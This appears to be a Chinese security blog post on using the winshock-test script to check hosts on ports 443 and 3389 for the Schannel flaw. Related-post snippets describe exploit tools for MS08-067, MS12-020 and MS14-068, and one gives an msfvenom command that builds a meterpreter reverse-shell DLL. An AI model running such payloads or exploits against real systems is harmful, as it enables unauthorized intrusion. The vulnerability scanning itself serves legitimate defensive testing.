j4s0nh4ck
- 浏览: 285133 次
-
文章分类
- 全部博客 (276)
- burp+hydra暴力破解 (1)
- kali linux工具集 (6)
- kali (59)
- linux (54)
- password (14)
- web (63)
- 渗透测试 (50)
- windows (40)
- metasploit (9)
- 信息收集 (32)
- burp suit (4)
- 安全审计 (9)
- https://github.com/secretsquirrel/the-backdoor-factory (0)
- nmap (4)
- arachni (2)
- 工具 (5)
- sql (3)
- 网络 (2)
- 后渗透测试 (10)
- 内网 (5)
- 无线 (2)
- C (3)
- bios (1)
- RoR (12)
- mongodb (1)
- linxu (1)
- gdb (1)
- linux,虚拟化 (1)
- python (4)
最新评论
工具地址:https://github.com/anexia-it/winshock-test
下载方法:
扫描原理:根据扫描支持的4中密码来判断是否有漏洞。
漏洞原理:http://www.freebuf.com/vuls/52110.html
工具使用方法:
./winshock_test.sh 10.0.0.1 3389
./winshock_test.sh 10.0.0.2 443
扫描结果:
443端口
3389端口:
下载方法:
git clone https://github.com/anexia-it/winshock-test.git
扫描原理:根据扫描支持的4中密码来判断是否有漏洞。
漏洞原理:http://www.freebuf.com/vuls/52110.html
工具使用方法:
./winshock_test.sh 10.0.0.1 3389
./winshock_test.sh 10.0.0.2 443
扫描结果:
443端口
引用
root@kali:~/winshock-test# ./winshock_test.sh xxx.xxx.xxx.xxx 443
Checking if script is up-to-date...
Script is up-to-date.
*** IMPORTANT ***
...
Checking if script is up-to-date...
Script is up-to-date.
*** IMPORTANT ***
...
3389端口:
引用
root@kali:~/winshock-test# ./winshock_test.sh xxx.xxx.xxx.xxx 3389
Checking if script is up-to-date...
Script is up-to-date.
...
Checking if script is up-to-date...
Script is up-to-date.
...
分享到:
发表评论
-
[图] windows 10
2015-08-18 20:37 306网上下载的图片,忘了来源 -
windows提权集合
2015-06-30 00:23 572https://blog.netspi.com/5-ways- ... -
[转]Access to every PC and become local Admin
2015-06-29 21:50 522原文地址:http://www.gosecure.it/blo ... -
[转]Top Five Ways SpiderLabs Got Domain Admin on Your Internal Network
2015-06-29 21:46 1612原文地址:https://www.trustwave.com/ ... -
[转]如何获得window管理员权限
2015-06-29 21:21 466引用A tutorial on how to get into ... -
Window提权基本步骤
2015-06-03 22:00 769原文地址: http://www.fuzzysecurity. ... -
[转]malware persistence
2015-05-06 23:46 401原文地址:http://jumpespjump.blogspo ... -
[转]backdoor a windows domain
2015-05-06 22:56 492原文地址:http://jumpespjump.blogspo ... -
[译]解密MSSQL密码
2015-03-26 00:43 2863原文地址: https://blog.ne ... -
[转]badsamba
2015-03-20 00:55 318原文地址:http://blog.gdssecurity.co ... -
window增加硬盘性能方法
2015-02-05 01:03 349参考地址:http://way2h.blogspot.com/ ... -
[译]Skeleton Key Malware & Mimikatz
2015-01-28 20:29 794原文地址: http://adsecurity.org/?p= ... -
绕过PowerShell执行策略的15种方法
2015-01-28 02:27 935https://blog.netspi.com/15-ways ... -
[翻译]oledump: Extracting Embedded EXE From DOC
2015-01-04 22:40 935原文地址:http://blog.didierstevens. ... -
[工具]volatility----Windows内存取证
2015-01-04 22:01 1536下载地址:https://github.com/volatil ... -
[译]Windows提权:ahcache.sys/NtApphelpCacheControl
2015-01-03 21:12 1022原文地址:https://code.google.com/p/ ... -
[译]使用Volatility从memory dump获得密码
2014-12-30 12:27 3791原文地址:https://cyberarms.wordpres ... -
vmss2core将VMware镜像转换成memory dump
2014-12-26 23:59 0参考:http://kb.vmware.com/selfser ... -
Windows工具集
2014-12-25 00:54 526参考:https://community.rapid7.com ... -
Kerberos攻击
2014-12-18 01:39 611参考: 1. http://securityweekly.co ...
相关推荐
"minikataz"是一个提及的64位程序,很可能是一个轻量级的Kerberos模拟环境或测试工具,用于在安全环境中复现MS14-068漏洞。它可能帮助研究人员或安全专家在受控环境下理解漏洞的工作原理,测试修复措施,或者验证...
使用此类工具时,必须遵守合法性和道德规范,只应用于授权的安全评估和漏洞测试,而非非法入侵。在安全研究和渗透测试中,理解漏洞的工作原理、如何利用以及如何防护是非常重要的。因此,这个GUI工具可以帮助安全...
"ms14-068.exe"很可能是一个用于测试或缓解该漏洞的工具,可能包含漏洞利用代码或者修复补丁。 【描述】中的"域内神器"暗示了这个工具对于管理员来说,可能是处理或防范MS14-068漏洞的重要工具,尤其是在企业网络...
【描述】"很好用的工具,适合对于dos命令熟悉的人"表明该工具可能是一个用于测试或利用MS05-039漏洞的程序,它可能需要用户具备一定的DOS(Disk Operating System)命令操作知识。DOS命令是早期操作系统中使用的...
利用Win系统MS08-067漏洞 MS08-067漏洞是Windows操作系统中一个严重的漏洞,它允许攻击者在无需身份验证的情况下远程执行代码。该漏洞于2008年10月โดยMicrosoft发布了补丁,但直到现在仍然有很多系统没有打补丁...
【MS14-058 CVE-2014-4113】是一个重要的安全更新,主要针对Microsoft Office套件中的一个严重漏洞。这个漏洞编号为CVE-2014-4113,其影响了多个版本的Microsoft Office,包括Word、Excel和PowerPoint等应用程序。该...
* MS12-020.rb为严格符合rdp数据包规范的ruby脚本语言的MS12-020测试PoC * * Chinese Shit.py为网上流传的MS12-020漏洞程序Python脚本wireshark v2修正版 * 西班牙语XP SP3和Win7/R2都成功 * * Chinese Shit Silic ...
在司徒西大神易语言ms17010漏洞检测源码上稍做修改,并做成了批处理,可以单机也可以网段批量检测永恒之蓝漏洞。优点是体积小,扫描准确。缺点是扫描速度较慢。 使用方法: 此程序为易语言开发,如被误报病毒,可以...
【标题】"ms2012-20利用工具"涉及的是针对Microsoft Windows操作系统中的一个安全漏洞,MS12-020。这个工具被设计用于攻击那些开启了远程桌面服务(Remote Desktop Protocol, RDP)的系统。MS12-020是一个著名的漏洞...
综合来看,这个压缩包包含了一个完整的漏洞利用工具集,研究者可以借此深入理解漏洞的工作原理,而安全专业人员则可以用来测试系统是否受此漏洞影响,或者开发防御措施。但请注意,此类工具的非法使用可能导致法律...
描述中提到“MS12-020最新可用POC,利用MS12-020漏洞”,这进一步证实了这个压缩包包含的是与MS12-020漏洞相关的攻击代码或者利用工具。这个漏洞可能允许攻击者执行任意代码,从而获取对目标系统的控制权。 MS12-...
2. "rdpclient.exe"可能是受影响的RDP客户端程序,或者是模拟RDP客户端行为的测试工具。 3. "MS12-020利用工具 含bug修正版.rar"是一个修复了某些错误的漏洞利用工具的压缩包,包含了对原始exploit的改进,使得攻击...
【标题】"ms8067漏洞溢出工具"指的是针对MS08-067漏洞的利用工具,这是一个在Windows操作系统中广泛知名的漏洞。该工具通常被安全研究人员和黑客用于测试系统安全性或进行非法入侵。 【描述】提到这个工具“适合dos...
Metasploit是一款开源的安全测试工具,广泛用于安全评估和漏洞验证。在msfconsole中有两个模块,一个是攻击模块,另一个是漏洞检查模块。正确的操作流程是先使用检查模块确认目标系统是否存在MS12-020漏洞,如果检查...
标题“MS12-020利用工具”指的是微软在2012年发布的一个安全更新,该更新修复了一个编号为MS12-020的严重漏洞。这个漏洞主要影响了使用Apache web服务器的系统,特别是那些运行特定版本的Apache模块mod_jk。描述中...
标题中的"ms08-067_check.rar_MS08-052_MS08067_MS08067 python_ms08-067_che"提及了几个关键术语,它们主要与微软安全更新和一个特定的漏洞检查工具相关。"ms08-067"指的是微软在2008年发布的一个关键安全更新,...
MS08-06最新利用工具WSS白细胞发布 溢出后开启对方的4444端口 经过测试从XP到2000、2003、Vista都可以拿下权限 对方机器要有TCP139或TCP445端口 C:\>ms08067.exe MS08-067 Remote Stack Overflow Vulnerability ...
MS08-067 最新利用工具 直接溢出后开启对方4444端口 —————————————————————————————————————— 经过测试从XP到2000、2003、Vista都可以拿下权限,对方机器要有TCP139或TCP...
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.***.*** LPORT=4**** -f dll > x64.dll,reverse或者bind方式,替换到目录下,执行第一个检测安装backdoor,第二个选项卡attack就可以了。...
【标题】"ms08-067溢出工具"涉及的是一个著名的Windows系统安全漏洞,该漏洞在2008年被发现并命名为MS08-067。这个漏洞主要存在于微软的Server Service服务中,允许远程攻击者通过精心构造的网络请求触发系统内存的...